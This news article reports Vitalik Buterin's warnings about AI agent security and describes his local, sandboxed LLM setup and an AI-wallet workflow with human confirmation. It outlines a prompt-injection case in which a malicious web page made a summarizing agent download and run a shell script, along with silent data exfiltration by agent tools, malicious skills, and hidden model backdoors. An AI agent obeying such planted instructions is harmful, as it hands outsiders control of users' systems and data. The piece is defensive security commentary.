Vitalik Buterin Warns AI Agents Can Steal Data and Modify Settings Without User Knowledge

Ethereum co-founder Vitalik Buterin has warned that modern AI systems pose serious privacy and security risks, and has called for a shift to local-first AI infrastructure. 

In a detailed blog post, Buterin said cloud-based AI tools give external servers access to sensitive user data, and that newer AI agent systems can take actions without user confirmation, including modifying system settings and sending data to outside servers without any visible indication to the user.

What Are the Security Risks Buterin Is Warning About?

Buterin's concerns go beyond general privacy. He identified specific, documented risks tied to how AI agents operate in practice.

Security researchers have already demonstrated several of these vulnerabilities in real conditions:

• An AI agent was directed to summarize web pages, one of which was malicious. The page instructed the agent to download and execute a shell script, giving an external party control of the system
• Some agent tools were found to run silent network requests that sent user data to external servers without any notification to the user
• Roughly 15% of agent skills reviewed by researchers contained malicious instructions

Buterin also pointed to risks that are harder to detect. Some models may contain hidden backdoors, features built into a model that activate under specific conditions and cause the system to act in the developer's interest rather than the user's. 

He also noted that most models described as open-source are actually only "open-weights," meaning the model parameters are shared but the full internal structure and training process are not. This leaves room for unknown behavior that users cannot independently verify.

What Is the Difference Between a Chatbot and an AI Agent?

Buterin framed the current moment as a transition point in how AI is being used. Early AI tools operated as chatbots: a user asks a question and the model returns an answer. Agents are different. A user gives the system a task, and it then operates independently, sometimes for extended periods, using dozens or hundreds of tools to complete that task.

That shift significantly expands the risk surface. An agent that can browse the web, read files, send messages, and modify system settings has far more opportunity to cause harm, whether through a security flaw, a manipulation attempt, or a simple mistake, than a system that only answers questions.

How Buterin Set Up His Own Local AI System

Buterin said he has already stopped using cloud-based AI tools. He described his personal setup as "self-sovereign, local, private, and secure," built around three core principles: all AI inference runs on local hardware, all files are stored locally, and every process runs inside a sandbox.

A sandbox, in this context, is an isolated computing environment that restricts what a program can access. Buterin uses a tool called bubblewrap, which allows him to run AI tools in a directory-level sandbox where the program can only see files he explicitly allows, with controls over network port access and audio access as well.

Hardware Buterin Tested for Local AI Inference

Buterin tested several hardware setups to find what works for running AI models locally. The results varied meaningfully:

• A laptop with an NVIDIA 5090 GPU achieved approximately 90 tokens per second using the Qwen3.5:35B model
• An AMD Ryzen AI Max Pro with 128 GB of unified memory reached approximately 51 tokens per second
• The DGX Spark, marketed as a desktop AI supercomputer, achieved approximately 60 tokens per second

Buterin set 50 tokens per second as his personal minimum for usable performance. He described anything slower as too frustrating for practical use, and said 90 tokens per second is the ideal. He noted that the DGX Spark underperformed relative to its marketing, producing lower speeds than a good laptop GPU while also requiring additional networking setup to connect from a separate work device.

His software stack centers on llama-server, a background process that runs locally and exposes a port on the user's machine that other applications can call into. This allows any software built for OpenAI or Anthropic models to be redirected to a local model instead. He also uses llama-swap to make switching between models easier.

What Does This Mean for Crypto Wallets?

Buterin's concerns about AI security connect directly to how he thinks AI should be used inside crypto wallets. In comments published on his Farcaster account in March 2026, he outlined a specific technical workflow for AI-assisted transactions.

His position is not that AI should manage funds. It is that AI should propose actions, with independent verification and human confirmation sitting on top of those proposals. For high-value transactions, he described a three-step process: the AI proposes a plan, a local light client simulates the execution of that plan on-chain, and the user reviews both the plain-language description and the simulated outcome before confirming.

A local light client verifies blockchain data without downloading the full chain. Pairing that with an AI layer means users can see exactly what a transaction will do before it is broadcast to the network, without relying on a third-party interface.

Why Removing DApp Interfaces Matters

Most crypto users interact with decentralized applications through browser-based frontends. Those interfaces have historically been a significant attack surface. Frontend hijacks, malicious script injections, and fake approval prompts have resulted in hundreds of millions of dollars in losses over recent years.

Buterin argued that AI-powered wallets could remove those interfaces entirely. If a user states what they want to do in plain language and the wallet assembles and simulates the transaction directly, there is no third-party website to compromise. 

"Removing DApp UIs from the picture completely solves a large number of attack vectors, for both theft and privacy," he wrote.

For lower-stakes operations, Buterin sees room for more automation. An AI wallet could reasonably handle monitoring transaction patterns for unusual activity, suggesting gas fees based on current network conditions, routing token swaps through efficient paths, and flagging suspicious contract interactions before approval. These are tasks where errors are recoverable and where automation reduces complexity for non-technical users.

According to Buterin, large language models should not be trusted with unchecked authority over large sums of money. LLMs generate responses based on statistical patterns, not deterministic logic. They can misinterpret instructions or be manipulated through prompt injection, a technique where carefully crafted inputs cause the model to behave in unintended ways. Each layer in his proposed workflow adds an independent check specifically to prevent that kind of failure.

Why the AI Agent Market Makes These Risks More Urgent

The concerns Buterin raised are not hypothetical. Industry estimates put the AI agents market at approximately $8 billion in 2025, with projections suggesting growth to over $48 billion by 2030, representing an annual growth rate of more than 43%. As more software is built around autonomous AI systems that operate with reduced human oversight, the security gaps he identified become harder to ignore at scale.

Conclusion

Buterin's warnings are backed by documented research. Security vulnerabilities in AI agents have already been demonstrated in real conditions, and the shift from chatbots to autonomous agents makes those risks harder to contain. 

His local-first setup and three-step wallet workflow are not rejections of AI. They are attempts to use it without surrendering control over data or funds. As AI agents become more capable, the question of who actually controls their actions becomes harder to ignore.

Resources

1. Article by Vitalik Buterin: My self-sovereign / local / private / secure LLM setup, April 2026

2. Vitalik Buterin on Farcaster: Post on March 5

3. Report by BCC Research: AI Agents Market to Grow 43.3% Annually Through 2030